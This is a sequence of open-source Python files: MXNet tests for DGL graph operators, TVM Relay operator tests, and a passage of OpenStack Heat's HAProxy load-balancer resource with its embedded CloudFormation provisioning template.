out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 4)
check_non_uniform(out, num_hops=1, max_num_vertices=5)
seed = mx.nd.array([0], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=1, num_neighbor=1, max_num_vertices=4)
assert (len(out) == 4)
check_non_uniform(out, num_hops=1, max_num_vertices=4)
seed = mx.nd.array([0], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=2, num_neighbor=1, max_num_vertices=4)
assert (len(out) == 4)
check_non_uniform(out, num_hops=2, max_num_vertices=4)
seed = mx.nd.array([0,2,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 4)
check_non_uniform(out, num_hops=1, max_num_vertices=5)
seed = mx.nd.array([0,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 4)
check_non_uniform(out, num_hops=1, max_num_vertices=5)
seed = mx.nd.array([0,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=2, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 4)
check_non_uniform(out, num_hops=2, max_num_vertices=5)
seed = mx.nd.array([0,4], dtype=np.int64)
out = mx.nd.contrib.dgl_csr_neighbor_non_uniform_sample(a, prob, seed, num_args=3, num_hops=1, num_neighbor=2, max_num_vertices=5)
assert (len(out) == 4)
check_non_uniform(out, num_hops=1, max_num_vertices=5)
def test_edge_id():
shape = rand_shape_2d()
data = rand_ndarray(shape, stype='csr', density=0.4)
ground_truth = np.zeros(shape, dtype=np.float32)
ground_truth -= 1.0
indptr_np = data.indptr.asnumpy()
data_np = data.data.asnumpy()
indices_np = data.indices.asnumpy()
for i in range(shape[0]):
for j in range(indptr_np[i], indptr_np[i+1]):
idx = indices_np[j]
ground_truth[i, idx] = data_np[j]
np_u = np.random.randint(0, shape[0], size=(5, ))
np_v = np.random.randint(0, shape[1], size=(5, ))
mx_u = mx.nd.array(np_u)
mx_v = mx.nd.array(np_v)
assert_almost_equal(mx.nd.contrib.edge_id(data, mx_u, mx_v).asnumpy(),
ground_truth[np_u, np_v], rtol=1e-5, atol=1e-6)
def generate_graph(n):
arr = sp.sparse.random(n, n, density=0.2, format='coo')
arr.data = np.arange(0, len(arr.row), dtype=np.float32)
return arr.tocsr(), mx.nd.sparse.csr_matrix(arr.tocsr()).astype(np.int64)
def test_subgraph():
sp_g, g = generate_graph(100)
vertices = np.unique(np.random.randint(0, 100, size=(20)))
subgs = mx.nd.contrib.dgl_subgraph(g, mx.nd.array(vertices, dtype=np.int64),
return_mapping=True)
subgs[0].check_format()
subgs[1].check_format()
assert_array_equal(subgs[0].indptr, subgs[1].indptr)
assert_array_equal(subgs[0].indices, subgs[1].indices)
sp_subg = subgs[1].asscipy()
for i in range(len(subgs[0].indptr) - 1):
subv1 = i
v1 = vertices[subv1]
row_start = int(subgs[0].indptr[subv1].asnumpy()[0])
row_end = int(subgs[0].indptr[subv1 + 1].asnumpy()[0])
if row_start >= len(subgs[0].indices):
remain = subgs[0].indptr[subv1:].asnumpy()
assert np.sum(remain == row_start) == len(remain)
break
row = subgs[0].indices[row_start:row_end]
for j, subv2 in enumerate(row.asnumpy()):
v2 = vertices[subv2]
assert sp_g[v1, v2] == sp_subg[subv1, subv2]
def test_adjacency():
sp_g, g = generate_graph(100)
adj = mx.nd.contrib.dgl_adjacency(g)
assert adj.dtype == np.float32
assert adj.shape == g.shape
assert_array_equal(adj.indptr, g.indptr)
assert_array_equal(adj.indices, g.indices)
assert_array_equal(adj.data, mx.nd.ones(shape=g.indices.shape))
if __name__ == "__main__":
import nose
nose.runmodule()
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
import numpy as np
from tvm import relay
from tvm.relay import transform
from tvm.relay.testing import ctx_list
import topi.testing
def run_infer_type(expr):
mod = relay.Module.from_expr(expr)
mod = transform.InferType()(mod)
entry = mod["main"]
return entry if isinstance(expr, relay.Function) else entry.body
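# Illustrative sketch (not part of the original tests): run_infer_type wraps an
# arbitrary Relay expression in a module, runs the InferType pass, and returns
# the typed expression, so checked_type can be asserted on directly.
def _example_run_infer_type():
    x = relay.var("x", relay.TensorType((3, 4), "float32"))
    y = relay.var("y", relay.TensorType((4,), "float32"))
    z = run_infer_type(relay.add(x, y))
    # broadcasting (3, 4) with (4,) yields (3, 4)
    assert z.checked_type == relay.TensorType((3, 4), "float32")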
def test_binary_op():
def check_binary_op(opfunc, ref):
n = tvm.var("n")
t1 = relay.TensorType((5, n, 5))
t2 = relay.TensorType((n, 1))
x = relay.var("x", t1)
y = relay.var("y", t2)
z = opfunc(x, y)
# test printer
assert ("{}(%x, %y)".format(z.op.name)) in z.astext()
zz = run_infer_type(z)
assert zz.checked_type == t1
if ref is not None:
t1 = relay.TensorType((5, 10, 5))
t2 = relay.TensorType((5, 10, 5))
x = relay.var("x", t1)
y = relay.var("y", t2)
z = opfunc(x, y)
x_data = np.random.rand(5, 10, 5).astype(t1.dtype)
y_data = np.random.rand(5, 10, 5).astype(t2.dtype)
ref_res = ref(x_data, y_data)
func = relay.Function([x, y], z)
for target, ctx in ctx_list():
intrp = relay.create_executor("graph", ctx=ctx, target=target)
op_res = intrp.evaluate(func)(x_data, y_data)
tvm.testing.assert_allclose(op_res.asnumpy(), ref_res)
for opfunc, ref in [(relay.power, np.power)]:
check_binary_op(opfunc, ref)
def test_cmp_type():
for op, ref in ((relay.greater, np.greater),
(relay.greater_equal, np.greater_equal),
(relay.less, np.less),
(relay.less_equal, np.less_equal),
(relay.equal, np.equal),
(relay.not_equal, np.not_equal)):
x = relay.var("x", relay.TensorType((10, 4), "float32"))
y = relay.var("y", relay.TensorType((5, 10, 1), "float32"))
z = op(x, y)
zz = run_infer_type(z)
assert zz.checked_type == relay.TensorType((5, 10, 4), "bool")
if ref is not None:
x_shape = (10, 4)
y_shape = (5, 10, 1)
t1 = relay.TensorType(x_shape)
t2 = relay.TensorType(y_shape)
x = relay.var("x", t1)
y = relay.var("y", t2)
z = op(x, y)
x_data = np.random.rand(*x_shape).astype(t1.dtype)
y_data = np.random.rand(*y_shape).astype(t2.dtype)
ref_res = ref(x_data, y_data)
func = relay.Function([x, y], z)
for target, ctx in ctx_list():
intrp = relay.create_executor("graph", ctx=ctx, target=target)
op_res = intrp.evaluate(func)(x_data, y_data)
tvm.testing.assert_allclose(op_res.asnumpy(), ref_res)
def test_binary_int_broadcast():
for op, ref in [(relay.right_shift, np.right_shift),
(relay.left_shift, np.left_shift),
(relay.mod, np.mod),
(relay.maximum, np.maximum),
(relay.minimum, np.minimum)]:
x = relay.var("x", relay.TensorType((10, 4), "int32"))
y = relay.var("y", relay.TensorType((5, 10, 1), "int32"))
z = op(x, y)
zz = run_infer_type(z)
assert zz.checked_type == relay.TensorType((5, 10, 4), "int32")
if ref is not None:
x_shape = (10, 4)
y_shape = (5, 10, 1)
t1 = relay.TensorType(x_shape, 'int32')
t2 = relay.TensorType(y_shape, 'int32')
x_data = np.random.rand(*x_shape).astype(t1.dtype)
y_data = np.random.rand(*y_shape).astype(t2.dtype)
func = relay.Function([x, y], z)
ref_res = ref(x_data, y_data)
for target, ctx in ctx_list():
intrp = relay.create_executor("graph", ctx=ctx, target=target)
op_res = intrp.evaluate(func)(x_data, y_data)
tvm.testing.assert_allclose(op_res.asnumpy(), ref_res)
def test_where():
shape = (3, 4)
dtype = "float32"
cond = relay.var("cond", relay.TensorType(shape, dtype))
x = relay.var("x", relay.TensorType(shape, dtype))
y = relay.var("y", relay.TensorType(shape, dtype))
z = relay.where(cond, x, y)
zz = run_infer_type(z)
assert zz.checked_type == relay.TensorType(shape, dtype)
func = relay.Function([cond, x, y], z)
condition = np.random.uniform(low=-1, high=1, size=shape).astype(dtype)
x = np.random.uniform(size=shape).astype(dtype)
y = np.random.uniform(size=shape).astype(dtype)
ref_res = np.where(condition, x, y)
for target, ctx in ctx_list():
for kind in ["graph", "debug"]:
intrp = relay.create_executor(kind, ctx=ctx, target=target)
op_res = intrp.evaluate(func)(condition, x, y)
tvm.testing.assert_allclose(op_res.asnumpy(), ref_res, rtol=1e-5)
def verify_reduce(funcs, data, axis, keepdims, exclude, output, dtype="float32"):
test_func = funcs[0]
ref_func = funcs[1]
dtype = "bool" if ref_func in [np.all] else dtype
x = relay.var("x", relay.TensorType(data, dtype))
z = test_func(x, axis, keepdims, exclude)
zz = run_infer_type(z)
if axis:
assert "axis=" in z.astext()
if keepdims:
assert "keepdims=" in z.astext()
if exclude:
assert "exclude=" in z.astext()
out_type = "int32" if test_func in [relay.argmin, relay.argmax] else dtype
assert zz.checked_type == relay.ty.TensorType(output, out_type)
    if all(isinstance(v, tvm.expr.Var) for v in data):
return
func = relay.Function([x], z)
x_data = np.random.choice([True, False], size=data) if ref_func in [np.all] \
else np.random.uniform(size=data).astype(dtype)
if ref_func in [np.sum]:
ref_res = ref_func(x_data + 0, axis=axis, dtype=dtype, keepdims=keepdims)
elif ref_func in [np.max, np.min, np.mean, np.prod]:
ref_res = ref_func(x_data + 0, axis=axis, keepdims=keepdims)
else: #argmin/argmax
if axis and not isinstance(axis, int) and len(axis) > 1 :
return
ref_res = ref_func(x_data + 0, axis=axis, keepdims=keepdims)
for target, ctx in ctx_list():
intrp1 = relay.create_executor("graph", ctx=ctx, target=target)
intrp2 = relay.create_executor("debug", ctx=ctx, target=target)
op_res1 = intrp1.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res1.asnumpy(), ref_res, rtol=1e-5)
op_res2 = intrp2.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res2.asnumpy(), ref_res, rtol=1e-5)
def test_reduce_functions():
def _with_keepdims(func):
def _wrapper(data, axis=None, keepdims=False):
if not keepdims:
return func(data, axis=axis)
else:
if axis is not None:
axis = axis if isinstance(axis, int) else axis[0]
out_shape = list(data.shape)
out_shape[axis] = 1
else:
out_shape = [1 for _ in range(len(data.shape))]
return func(data, axis=axis).reshape(out_shape)
return _wrapper
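    # Illustrative note (not part of the original test): numpy's argmin/argmax
    # lack a keepdims argument here, so the wrapper above reshapes the result,
    # e.g. _with_keepdims(np.argmax)(np.zeros((2, 3, 4)), axis=1, keepdims=True)
    # has shape (2, 1, 4), matching relay.argmax with keepdims=True.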
d1, d2, d3, d4 = tvm.var("d1"), tvm.var("d2"), tvm.var("d3"), tvm.var("d4")
for func in [[relay.sum, np.sum],
[relay.max, np.max],
[relay.min, np.min],
[relay.mean, np.mean],
[relay.prod, np.prod],
[relay.all, np.all],
[relay.argmin, _with_keepdims(np.argmin)],
[relay.argmax, _with_keepdims(np.argmax)]]:
verify_reduce(func, (d1, d2, d3, d4), None, False, False, ())
verify_reduce(func, (d1, d2, d3, d4), 2, True, False, (d1, d2, 1, d4))
verify_reduce(func, (d1, d2, d3, d4), 0, True, False, (1, d2, d3, d4))
verify_reduce(func, (d1, d2, d3), 1, True, False, (d1, 1, d3))
verify_reduce(func, (d1, d2, d3), 0, True, False, (1, d2, d3))
verify_reduce(func, (d1, d2, d3), None, True, False, (1, 1, 1))
verify_reduce(func, (d1, d2, d3), (0, 1), True, False, (1, 1, d3))
verify_reduce(func, (2, 3, 4), 1, True, False, (2, 1, 4))
verify_reduce(func, (2, 3, 4), (1,), True, False, (2, 1, 4))
verify_reduce(func, (2, 3, 4), -1, True, False, (2, 3, 1))
verify_reduce(func, (2, 3, 4), (0, 1, 2), False, False, ())
verify_reduce(func, (4, 4, 3), None, False, False, ())
verify_reduce(func, (4, 4, 3), (0, 2), False, False, (4,))
verify_reduce(func, (128, 24, 128), (0, 1), False, False, (128,))
verify_reduce(func, (128, 24, 128), (0, 2), False, False, (24,))
verify_reduce(func, (128, 24, 128), (0, 1), True, False, (1, 1, 128))
verify_reduce(func, (128, 24, 128), (0, 2), True, False, (1, 24, 1))
def test_strided_slice():
def verify(dshape, begin, end, strides, output, test_ref=True):
x = relay.var("x", relay.TensorType(dshape, "float32"))
z = relay.strided_slice(x, begin=begin, end=end, strides=strides)
func = relay.Function([x], z)
func = run_infer_type(func)
text = func.astext()
assert "begin=" in text
assert "end=" in text
if output:
assert func.body.checked_type == relay.ty.TensorType(output, "float32")
if not test_ref:
return
x_data = np.random.uniform(size=dshape).astype("float32")
ref_res = topi.testing.strided_slice_python(
x_data, begin, end, strides)
for target, ctx in ctx_list():
intrp = relay.create_executor("graph", ctx=ctx, target=target)
op_res = intrp.evaluate(func)(x_data)
tvm.testing.assert_allclose(op_res.asnumpy(), ref_res)
d1, d2, d3, d4 = tvm.var("d1"), tvm.var("d2"), tvm.var("d3"), tvm.var("d4")
verify((d1, d2, 3), [None, None, 1], [None, None, 2], None, (d1, d2, 1), False)
verify((3, 4, 3), [0, 0, 0], [4, -5, 4], [1, -1, 2], (3, 1, 2))
verify((3, 4, 3), [1, 1, 0], [4, 4, 3], [2, 1, 1], (1, 3, 3))
verify((3, 4, 3), [1, -1, 0], [4, -5, 3], [2, -1, 1], (1, 4, 3))
verify((3, 4, 3), [1, 0, 0], [2, 2, 3], [1, 1, 2], (1, 2, 2))
verify((3, 4, 3), [1, -1, 0], [2, -3, 3], [1, -1, 1], (1, 2, 3))
verify((3, 4, 3), [1, 1, 0], [4, 4, 3], None, (2, 3, 3))
verify((3, 4, 3), [1, 1, 0], [4, 1000, 3], None, (2, 3, 3))
verify((3, 4, 3), [1, 1, 0], [4, 4], None, (2, 3, 3))
verify((3, 4, 3), [1, 1], [4, 4, 3], None, (2, 3, 3))
if __name__ == "__main__":
test_strided_slice()
test_binary_op()
test_cmp_type()
test_binary_int_broadcast()
test_where()
test_reduce_functions()
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from oslo_config import cfg
from oslo_log import log as logging
import six
from heat.common import exception
from heat.common.i18n import _
from heat.common import template_format
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine.resources import stack_resource
LOG = logging.getLogger(__name__)
lb_template_default = r'''
{
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "Built in HAProxy server using Fedora 21 x64 cloud image",
"Parameters" : {
"KeyName" : {
"Type" : "String"
},
"LbImageId" : {
"Type" : "String",
"Default" : "Fedora-Cloud-Base-20141203-21.x86_64"
},
"LbFlavor" : {
"Type" : "String",
"Default" : "m1.small"
},
"LBTimeout" : {
"Type" : "String",
"Default" : "600"
},
"SecurityGroups" : {
"Type" : "CommaDelimitedList",
"Default" : []
}
},
"Resources": {
"latency_watcher": {
"Type": "AWS::CloudWatch::Alarm",
"Properties": {
"MetricName": "Latency",
"Namespace": "AWS/ELB",
"Statistic": "Average",
"Period": "60",
"EvaluationPeriods": "1",
"Threshold": "2",
"AlarmActions": [],
"ComparisonOperator": "GreaterThanThreshold"
}
},
"CfnLBUser" : {
"Type" : "AWS::IAM::User"
},
"CfnLBAccessKey" : {
"Type" : "AWS::IAM::AccessKey",
"Properties" : {
"UserName" : {"Ref": "CfnLBUser"}
}
},
"LB_instance": {
"Type": "AWS::EC2::Instance",
"Metadata": {
"AWS::CloudFormation::Init": {
"config": {
"packages": {
"yum": {
"haproxy" : [],
"socat" : []
}
},
"services": {
"systemd": {
"crond" : { "enabled" : "true", "ensureRunning" : "true" }
}
},
"files": {
"/etc/cfn/cfn-credentials" : {
"content" : { "Fn::Join" : ["", [
"AWSAccessKeyId=", { "Ref" : "CfnLBAccessKey" }, "\n",
"AWSSecretKey=", {"Fn::GetAtt": ["CfnLBAccessKey",
"SecretAccessKey"]}, "\n"
]]},
"mode" : "000400",
"owner" : "root",
"group" : "root"
},
"/etc/cfn/cfn-hup.conf" : {
"content" : { "Fn::Join" : ["", [
"[main]\n",
"stack=", { "Ref" : "AWS::StackId" }, "\n",
"credential-file=/etc/cfn/cfn-credentials\n",
"region=", { "Ref" : "AWS::Region" }, "\n",
"interval=60\n"
]]},
"mode" : "000400",
"owner" : "root",
"group" : "root"
},
"/etc/cfn/hooks.conf" : {
"content": { "Fn::Join" : ["", [
"[cfn-init]\n",
"triggers=post.update\n",
"path=Resources.LB_instance.Metadata\n",
"action=/opt/aws/bin/cfn-init -s ",
{ "Ref": "AWS::StackId" },
" -r LB_instance ",
" --region ", { "Ref": "AWS::Region" }, "\n",
"runas=root\n",
"\n",
"[reload]\n",
"triggers=post.update\n",
"path=Resources.LB_instance.Metadata\n",
"action=systemctl reload-or-restart haproxy.service\n",
"runas=root\n"
]]},
"mode" : "000400",
"owner" : "root",
"group" : "root"
},
"/etc/haproxy/haproxy.cfg": {
"content": "",
"mode": "000644",
"owner": "root",
"group": "root"
},
"/root/haproxy_tmp.te": {
"mode": "000600",
"owner": "root",
"group": "root",
"content": { "Fn::Join" : [ "", [
"module haproxy_tmp 1.0;\n",
"require { type tmp_t; type haproxy_t;",
"class sock_file { rename write create unlink link };",
"class dir { write remove_name add_name };}\n",
"allow haproxy_t ",
"tmp_t:dir { write remove_name add_name };\n",
"allow haproxy_t ",
"tmp_t:sock_file { rename write create unlink link};\n"
]]}
},
"/tmp/cfn-hup-crontab.txt" : {
"content" : { "Fn::Join" : ["", [
"MAIL=\"\"\n",
"\n",
"* * * * * /opt/aws/bin/cfn-hup -f\n",
"* * * * * /opt/aws/bin/cfn-push-stats ",
" --watch ", { "Ref" : "latency_watcher" }, " --haproxy\n"
]]},
"mode" : "000600",
"owner" : "root",
"group" : "root"
}
}
}
}
},
"Properties": {
"ImageId": { "Ref": "LbImageId" },
"InstanceType": { "Ref": "LbFlavor" },
"KeyName": { "Ref": "KeyName" },
"SecurityGroups": { "Ref": "SecurityGroups" },
"UserData": { "Fn::Base64": { "Fn::Join": ["", [
"#!/bin/bash -v\n",
"# Helper function\n",
"function error_exit\n",
"{\n",
" /opt/aws/bin/cfn-signal -e 1 -r \"$1\" '",
{ "Ref" : "WaitHandle" }, "'\n",
" exit 1\n",
"}\n",
"/opt/aws/bin/cfn-init -s ",
{ "Ref": "AWS::StackId" },
" -r LB_instance ",
" --region ", { "Ref": "AWS::Region" },
" || error_exit 'Failed to run cfn-init'\n",
"# HAProxy+SELinux, https://www.mankier.com/8/haproxy_selinux \n",
"# this is exported by selinux-policy >=3.12.1.196\n",
"setsebool haproxy_connect_any 1\n",
"# when the location of haproxy stats file is fixed\n",
"# in heat-cfntools and AWS::ElasticLoadBalancing::LoadBalancer\n",
"# to point to /var/lib/haproxy/stats, \n",
"# this next block can be removed.\n",
"# compile custom module to allow /tmp files and sockets access\n",
"cd /root\n",
"checkmodule -M -m -o haproxy_tmp.mod haproxy_tmp.te\n",
"semodule_package -o haproxy_tmp.pp -m haproxy_tmp.mod\n",
"semodule -i haproxy_tmp.pp\n",
"touch /tmp/.haproxy-stats\n",
"semanage fcontext -a -t haproxy_tmpfs_t /tmp/.haproxy-stats\n",
"restorecon -R -v /tmp/.haproxy-stats\n",
"# install cfn-hup crontab\n",
"crontab /tmp/cfn-hup-crontab.txt\n",
"# restart haproxy service to catch initial changes\n",
"systemctl reload-or-restart haproxy.service\n",
"# LB setup completed, signal success\n",
"/opt/aws/bin/cfn-signal -e 0 -r \"LB server setup complete\" '",
{ "Ref" : "WaitHandle" }, "'\n"
]]}}
}
},
"WaitHandle" : {
"Type" : "AWS::CloudFormation::WaitConditionHandle"
},
"WaitCondition" : {
"Type" : "AWS::CloudFormation::WaitCondition",
"DependsOn" : "LB_instance",
"Properties" : {
"Handle" : {"Ref" : "WaitHandle"},
"Timeout" : {"Ref" : "LBTimeout"}
}
}
},
"Outputs": {
"PublicIp": {
"Value": { "Fn::GetAtt": [ "LB_instance", "PublicIp" ] },
"Description": "instance IP"
}
}
}
'''
# Allow user to provide alternative nested stack template to the above
loadbalancer_opts = [
cfg.StrOpt('loadbalancer_template',
help=_('Custom template for the built-in '
'loadbalancer nested stack.'))]
cfg.CONF.register_opts(loadbalancer_opts)
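# Illustrative sketch (an assumption, not part of the original module): the
# option registered above would typically be set in heat.conf as
#
#   [DEFAULT]
#   loadbalancer_template = /etc/heat/templates/custom_haproxy_lb.json
#
# where the referenced file is a CFN-style template providing the same
# parameters and an LB_instance resource, as expected by get_parsed_template().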
class LoadBalancer(stack_resource.StackResource):
"""Implements a HAProxy-bearing instance as a nested stack.
The template for the nested stack can be redefined with
``loadbalancer_template`` option in ``heat.conf``.
Generally the image used for the instance must have the following
packages installed or available for installation at runtime::
- heat-cfntools and its dependencies like python-psutil
- cronie
- socat
- haproxy
    The current default built-in template uses the Fedora 21 x86_64 base
    cloud image (https://getfedora.org/cloud/download/) and, apart from
    installing packages, goes through some hoops around SELinux due to
    peculiarities of heat-cfntools.
"""
PROPERTIES = (
AVAILABILITY_ZONES, HEALTH_CHECK, INSTANCES, LISTENERS,
APP_COOKIE_STICKINESS_POLICY, LBCOOKIE_STICKINESS_POLICY,
SECURITY_GROUPS, SUBNETS,
) = (
'AvailabilityZones', 'HealthCheck', 'Instances', 'Listeners',
'AppCookieStickinessPolicy', 'LBCookieStickinessPolicy',
'SecurityGroups', 'Subnets',
)
_HEALTH_CHECK_KEYS = (
HEALTH_CHECK_HEALTHY_THRESHOLD, HEALTH_CHECK_INTERVAL,
HEALTH_CHECK_TARGET, HEALTH_CHECK_TIMEOUT,
HEALTH_CHECK_UNHEALTHY_THRESHOLD,
) = (
'HealthyThreshold', 'Interval',
'Target', 'Timeout',
'UnhealthyThreshold',
)
_LISTENER_KEYS = (
LISTENER_INSTANCE_PORT, LISTENER_LOAD_BALANCER_PORT, LISTENER_PROTOCOL,
LISTENER_SSLCERTIFICATE_ID, LISTENER_POLICY_NAMES,
) = (
'InstancePort', 'LoadBalancerPort', 'Protocol',
'SSLCertificateId', 'PolicyNames',
)
ATTRIBUTES = (
CANONICAL_HOSTED_ZONE_NAME, CANONICAL_HOSTED_ZONE_NAME_ID, DNS_NAME,
SOURCE_SECURITY_GROUP_GROUP_NAME, SOURCE_SECURITY_GROUP_OWNER_ALIAS,
) = (
'CanonicalHostedZoneName', 'CanonicalHostedZoneNameID', 'DNSName',
'SourceSecurityGroup.GroupName', 'SourceSecurityGroup.OwnerAlias',
)
properties_schema = {
AVAILABILITY_ZONES: properties.Schema(
properties.Schema.LIST,
_('The Availability Zones in which to create the load balancer.'),
required=True
),
HEALTH_CHECK: properties.Schema(
properties.Schema.MAP,
_('An application health check for the instances.'),
schema={
HEALTH_CHECK_HEALTHY_THRESHOLD: properties.Schema(
properties.Schema.INTEGER,
_('The number of consecutive health probe successes '
'required before moving the instance to the '
'healthy state.'),
required=True
),
HEALTH_CHECK_INTERVAL: properties.Schema(
properties.Schema.INTEGER,
_('The approximate interval, in seconds, between '
'health checks of an individual instance.'),
required=True
),
HEALTH_CHECK_TARGET: properties.Schema(
properties.Schema.STRING,
_('The port being checked.'),
required=True
),
HEALTH_CHECK_TIMEOUT: properties.Schema(
properties.Schema.INTEGER,
_('Health probe timeout, in seconds.'),
required=True
),
HEALTH_CHECK_UNHEALTHY_THRESHOLD: properties.Schema(
properties.Schema.INTEGER,
_('The number of consecutive health probe failures '
'required before moving the instance to the '
'unhealthy state'),
required=True
),
}
),
INSTANCES: properties.Schema(
properties.Schema.LIST,
_('The list of instance IDs load balanced.'),
update_allowed=True
),
LISTENERS: properties.Schema(
properties.Schema.LIST,
_('One or more listeners for this load balancer.'),
schema=properties.Schema(
properties.Schema.MAP,
schema={
LISTENER_INSTANCE_PORT: properties.Schema(
properties.Schema.INTEGER,
_('TCP port on which the instance server is '
'listening.'),
required=True
),
LISTENER_LOAD_BALANCER_PORT: properties.Schema(
properties.Schema.INTEGER,
_('The external load balancer port number.'),
required=True
),
LISTENER_PROTOCOL: properties.Schema(
properties.Schema.STRING,
_('The load balancer transport protocol to use.'),
required=True,
constraints=[
constraints.AllowedValues(['TCP', 'HTTP']),
]
),
LISTENER_SSLCERTIFICATE_ID: properties.Schema(
properties.Schema.STRING,
_('Not Implemented.'),
implemented=False
),
LISTENER_POLICY_NAMES: properties.Schema(
properties.Schema.LIST,
_('Not Implemented.'),
implemented=False
),
},
),
required=True
),
APP_COOKIE_STICKINESS_POLICY: properties.Schema(
properties.Schema.STRING,
_('Not Implemented.'),
implemented=False
),
LBCOOKIE_STICKINESS_POLICY: properties.Schema(
properties.Schema.STRING,
_('Not Implemented.'),
implemented=False
),
SECURITY_GROUPS: properties.Schema(
properties.Schema.LIST,
_('List of Security Groups assigned on current LB.'),
update_allowed=True
),
SUBNETS: properties.Schema(
properties.Schema.LIST,
_('Not Implemented.'),
implemented=False
),
}
attributes_schema = {
CANONICAL_HOSTED_ZONE_NAME: attributes.Schema(
_("The name of the hosted zone that is associated with the "
"LoadBalancer."),
type=attributes.Schema.STRING
),
CANONICAL_HOSTED_ZONE_NAME_ID: attributes.Schema(
_("The ID of the hosted zone name that is associated with the "
"LoadBalancer."),
type=attributes.Schema.STRING
),
DNS_NAME: attributes.Schema(
_("The DNS name for the LoadBalancer."),
type=attributes.Schema.STRING
),
SOURCE_SECURITY_GROUP_GROUP_NAME: attributes.Schema(
_("The security group that you can use as part of your inbound "
"rules for your LoadBalancer's back-end instances."),
type=attributes.Schema.STRING
),
SOURCE_SECURITY_GROUP_OWNER_ALIAS: attributes.Schema(
_("Owner of the source security group."),
type=attributes.Schema.STRING
),
}
def _haproxy_config_global(self):
return '''
global
daemon
maxconn 256
stats socket /tmp/.haproxy-stats
defaults
mode http
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
'''
def _haproxy_config_frontend(self):
listener = self.properties[self.LISTENERS][0]
lb_port = listener[self.LISTENER_LOAD_BALANCER_PORT]
return '''
frontend http
bind *:%s
default_backend servers
''' % (lb_port)
def _haproxy_config_backend(self):
health_chk = self.properties[self.HEALTH_CHECK]
if health_chk:
timeout = int(health_chk[self.HEALTH_CHECK_TIMEOUT])
timeout_check = 'timeout check %ds' % timeout
spaces = ' '
else:
timeout_check = ''
spaces = ''
return '''
backend servers
balance roundrobin
option http-server-close
option forwardfor
option httpchk
%s%s
''' % (spaces, timeout_check)
def _haproxy_config_servers(self, instances):
listener = self.properties[self.LISTENERS][0]
inst_port = listener[self.LISTENER_INSTANCE_PORT]
spaces = ' '
check = ''
health_chk = self.properties[self.HEALTH_CHECK]
if health_chk:
check = ' check inter %ss fall %s rise %s' % (
health_chk[self.HEALTH_CHECK_INTERVAL],
health_chk[self.HEALTH_CHECK_UNHEALTHY_THRESHOLD],
health_chk[self.HEALTH_CHECK_HEALTHY_THRESHOLD])
servers = []
n = 1
nova_cp = self.client_plugin('nova')
for i in instances or []:
ip = nova_cp.server_to_ipaddress(i) or '0.0.0.0'
LOG.debug('haproxy server:%s', ip)
servers.append('%sserver server%d %s:%s%s' % (spaces, n,
ip, inst_port,
check))
n = n + 1
return '\n'.join(servers)
def _haproxy_config(self, instances):
# initial simplifications:
# - only one Listener
# - only http (no tcp or ssl)
#
# option httpchk HEAD /check.txt HTTP/1.0
return '%s%s%s%s\n' % (self._haproxy_config_global(),
self._haproxy_config_frontend(),
self._haproxy_config_backend(),
self._haproxy_config_servers(instances))
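    # Illustrative sketch (an assumption about the rendered output): for a
    # single listener with LoadBalancerPort 80, InstancePort 8080, one member
    # at 10.0.0.5 and no HealthCheck, _haproxy_config() produces roughly:
    #
    #   global
    #       daemon
    #       maxconn 256
    #       stats socket /tmp/.haproxy-stats
    #   defaults
    #       mode http
    #       timeout connect 5000ms
    #       timeout client 50000ms
    #       timeout server 50000ms
    #   frontend http
    #       bind *:80
    #       default_backend servers
    #   backend servers
    #       balance roundrobin
    #       option http-server-close
    #       option forwardfor
    #       option httpchk
    #       server server1 10.0.0.5:8080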
def get_parsed_template(self):
if cfg.CONF.loadbalancer_template:
with open(cfg.CONF.loadbalancer_template) as templ_fd:
LOG.info('Using custom loadbalancer template %s',
cfg.CONF.loadbalancer_template)
contents = templ_fd.read()
else:
contents = lb_template_default
return template_format.parse(contents)
def child_params(self):
params = {}
params['SecurityGroups'] = self.properties[self.SECURITY_GROUPS]
        # Pass through any of the nested template's parameters that the
        # owning stack also defines; the KeyName-less case is handled in
        # child_template()
for magic_param in ('KeyName', 'LbFlavor', 'LBTimeout', 'LbImageId'):
if magic_param in self.stack.parameters:
params[magic_param] = self.stack.parameters[magic_param]
return params
def child_template(self):
templ = self.get_parsed_template()
# If the owning stack defines KeyName, we use that key for the nested
# template, otherwise use no key
if 'KeyName' not in self.stack.parameters:
del templ['Resources']['LB_instance']['Properties']['KeyName']
del templ['Parameters']['KeyName']
return templ
def handle_create(self):
templ = self.child_template()
params = self.child_params()
if self.properties[self.INSTANCES]:
